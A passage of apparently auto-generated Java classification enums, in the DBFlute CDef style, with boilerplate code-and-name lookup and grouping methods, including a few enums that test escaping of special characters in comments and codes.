return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static SubItemTable codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof SubItemTable) { return (SubItemTable)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static SubItemTable nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<SubItemTable> listAll() {
return new ArrayList<SubItemTable>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<SubItemTable> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
if ("serviceAvailable".equalsIgnoreCase(groupName)) { return listOfServiceAvailable(); }
if ("lastestStatus".equalsIgnoreCase(groupName)) { return listOfLastestStatus(); }
throw new ClassificationNotFoundException("Unknown classification group: SubItemTable." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<SubItemTable> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<SubItemTable> clsList = new ArrayList<SubItemTable>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* サービスが利用できる会員 <br>
* The group elements:[正式会員, 仮会員]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<SubItemTable> listOfServiceAvailable() {
return new ArrayList<SubItemTable>(Arrays.asList(正式会員, 仮会員));
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* The group elements:[退会会員]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<SubItemTable> listOfLastestStatus() {
return new ArrayList<SubItemTable>(Arrays.asList(退会会員));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<SubItemTable> groupOf(String groupName) {
if ("serviceAvailable".equals(groupName)) { return listOfServiceAvailable(); }
if ("lastestStatus".equals(groupName)) { return listOfLastestStatus(); }
return new ArrayList<SubItemTable>(4);
}
@Override public String toString() { return code(); }
}
/**
* boolean classification for boolean column
*/
public enum BooleanFlg implements CDef {
/** Checked: means yes */
True("true", "Checked", emptyStrings())
,
/** Unchecked: means no */
False("false", "Unchecked", emptyStrings())
;
private static final Map<String, BooleanFlg> _codeClsMap = new HashMap<String, BooleanFlg>();
private static final Map<String, BooleanFlg> _nameClsMap = new HashMap<String, BooleanFlg>();
static {
for (BooleanFlg value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private BooleanFlg(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.BooleanFlg; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<BooleanFlg> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof BooleanFlg) { return OptionalThing.of((BooleanFlg)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<BooleanFlg> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static BooleanFlg codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof BooleanFlg) { return (BooleanFlg)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static BooleanFlg nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<BooleanFlg> listAll() {
return new ArrayList<BooleanFlg>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<BooleanFlg> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: BooleanFlg." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<BooleanFlg> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<BooleanFlg> clsList = new ArrayList<BooleanFlg>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<BooleanFlg> groupOf(String groupName) {
return new ArrayList<BooleanFlg>(4);
}
@Override public String toString() { return code(); }
}
/**
* master type of variant relation (biz-many-to-one)
*/
public enum VariantRelationMasterType implements CDef {
/** FooCls */
FooCls("FOO", "FooCls", emptyStrings())
,
/** BarCls */
BarCls("BAR", "BarCls", emptyStrings())
,
/** QuxCls */
QuxCls("QUX", "QuxCls", emptyStrings())
,
/** CorgeCls */
CorgeCls("CORGE", "CorgeCls", emptyStrings())
;
private static final Map<String, VariantRelationMasterType> _codeClsMap = new HashMap<String, VariantRelationMasterType>();
private static final Map<String, VariantRelationMasterType> _nameClsMap = new HashMap<String, VariantRelationMasterType>();
static {
for (VariantRelationMasterType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private VariantRelationMasterType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.VariantRelationMasterType; }
/**
* Is the classification in the group? <br>
* Foo or Bar or Qux <br>
* The group elements:[FooCls, BarCls, QuxCls]
* @return The determination, true or false.
*/
public boolean isFooBarQux() {
return FooCls.equals(this) || BarCls.equals(this) || QuxCls.equals(this);
}
public boolean inGroup(String groupName) {
if ("fooBarQux".equals(groupName)) { return isFooBarQux(); }
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<VariantRelationMasterType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof VariantRelationMasterType) { return OptionalThing.of((VariantRelationMasterType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<VariantRelationMasterType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static VariantRelationMasterType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof VariantRelationMasterType) { return (VariantRelationMasterType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static VariantRelationMasterType nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<VariantRelationMasterType> listAll() {
return new ArrayList<VariantRelationMasterType>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<VariantRelationMasterType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
if ("fooBarQux".equalsIgnoreCase(groupName)) { return listOfFooBarQux(); }
throw new ClassificationNotFoundException("Unknown classification group: VariantRelationMasterType." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<VariantRelationMasterType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<VariantRelationMasterType> clsList = new ArrayList<VariantRelationMasterType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* Foo or Bar or Qux <br>
* The group elements:[FooCls, BarCls, QuxCls]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<VariantRelationMasterType> listOfFooBarQux() {
return new ArrayList<VariantRelationMasterType>(Arrays.asList(FooCls, BarCls, QuxCls));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<VariantRelationMasterType> groupOf(String groupName) {
if ("fooBarQux".equals(groupName)) { return listOfFooBarQux(); }
return new ArrayList<VariantRelationMasterType>(4);
}
@Override public String toString() { return code(); }
}
/**
* qux type of variant relation (biz-many-to-one)
*/
public enum VariantRelationQuxType implements CDef {
/** Qua */
Qua("Qua", "Qua", emptyStrings())
,
/** Que */
Que("Que", "Que", emptyStrings())
,
/** Quo */
Quo("Quo", "Quo", emptyStrings())
;
private static final Map<String, VariantRelationQuxType> _codeClsMap = new HashMap<String, VariantRelationQuxType>();
private static final Map<String, VariantRelationQuxType> _nameClsMap = new HashMap<String, VariantRelationQuxType>();
static {
for (VariantRelationQuxType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private VariantRelationQuxType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.VariantRelationQuxType; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<VariantRelationQuxType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof VariantRelationQuxType) { return OptionalThing.of((VariantRelationQuxType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<VariantRelationQuxType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static VariantRelationQuxType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof VariantRelationQuxType) { return (VariantRelationQuxType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static VariantRelationQuxType nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<VariantRelationQuxType> listAll() {
return new ArrayList<VariantRelationQuxType>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<VariantRelationQuxType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: VariantRelationQuxType." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<VariantRelationQuxType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<VariantRelationQuxType> clsList = new ArrayList<VariantRelationQuxType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<VariantRelationQuxType> groupOf(String groupName) {
return new ArrayList<VariantRelationQuxType>(4);
}
@Override public String toString() { return code(); }
}
/**
* merged
*/
public enum QuxCls implements CDef {
/** Merged: merged qux element */
Merged("MRG", "Merged", emptyStrings())
,
/** QuxOne: QuxOne */
QuxOne("Q01", "QuxOne", emptyStrings())
,
/** QuxTwo: QuxTwo */
QuxTwo("Q02", "QuxTwo", emptyStrings())
,
/** QuxThree: QuxThree */
QuxThree("Q03", "QuxThree", emptyStrings())
;
private static final Map<String, QuxCls> _codeClsMap = new HashMap<String, QuxCls>();
private static final Map<String, QuxCls> _nameClsMap = new HashMap<String, QuxCls>();
static {
for (QuxCls value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private QuxCls(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.QuxCls; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<QuxCls> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof QuxCls) { return OptionalThing.of((QuxCls)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<QuxCls> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static QuxCls codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof QuxCls) { return (QuxCls)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static QuxCls nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<QuxCls> listAll() {
return new ArrayList<QuxCls>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<QuxCls> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: QuxCls." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<QuxCls> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<QuxCls> clsList = new ArrayList<QuxCls>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<QuxCls> groupOf(String groupName) {
return new ArrayList<QuxCls>(4);
}
@Override public String toString() { return code(); }
}
/**
* delimiter; & endBrace} & path\foo\bar
*/
public enum EscapedDfpropCls implements CDef {
/** First: delimiter & rear escape char */
First(";@\\", "First", emptyStrings())
,
/** Second: escape char & endBrace & delimiter */
Second("\\};", "Second", emptyStrings())
,
/** Third: startBrace & equal & endBrace */
Third("{=}", "Third", emptyStrings())
;
private static final Map<String, EscapedDfpropCls> _codeClsMap = new HashMap<String, EscapedDfpropCls>();
private static final Map<String, EscapedDfpropCls> _nameClsMap = new HashMap<String, EscapedDfpropCls>();
static {
for (EscapedDfpropCls value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private EscapedDfpropCls(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.EscapedDfpropCls; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<EscapedDfpropCls> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof EscapedDfpropCls) { return OptionalThing.of((EscapedDfpropCls)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<EscapedDfpropCls> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static EscapedDfpropCls codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof EscapedDfpropCls) { return (EscapedDfpropCls)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static EscapedDfpropCls nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<EscapedDfpropCls> listAll() {
return new ArrayList<EscapedDfpropCls>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<EscapedDfpropCls> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: EscapedDfpropCls." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<EscapedDfpropCls> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<EscapedDfpropCls> clsList = new ArrayList<EscapedDfpropCls>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<EscapedDfpropCls> groupOf(String groupName) {
return new ArrayList<EscapedDfpropCls>(4);
}
@Override public String toString() { return code(); }
}
/**
* /*IF pmb.yourTop*/><&
*/
public enum EscapedJavaDocCls implements CDef {
/** First: /*IF pmb.yourFooComment*/><& */
First("FOO", "First", emptyStrings())
,
/** Second: /*IF pmb.yourBarComment*/><& */
Second("BAR", "Second", emptyStrings())
;
private static final Map<String, EscapedJavaDocCls> _codeClsMap = new HashMap<String, EscapedJavaDocCls>();
private static final Map<String, EscapedJavaDocCls> _nameClsMap = new HashMap<String, EscapedJavaDocCls>();
static {
for (EscapedJavaDocCls value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private EscapedJavaDocCls(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.EscapedJavaDocCls; }
/**
* Is the classification in the group? <br>
* /*IF pmb.yourGroup*/><& <br>
* The group elements:[First, Second]
* @return The determination, true or false.
*/
public boolean isLineGroup() {
return First.equals(this) || Second.equals(this);
}
public boolean inGroup(String groupName) {
if ("lineGroup".equals(groupName)) { return isLineGroup(); }
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<EscapedJavaDocCls> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof EscapedJavaDocCls) { return OptionalThing.of((EscapedJavaDocCls)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<EscapedJavaDocCls> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
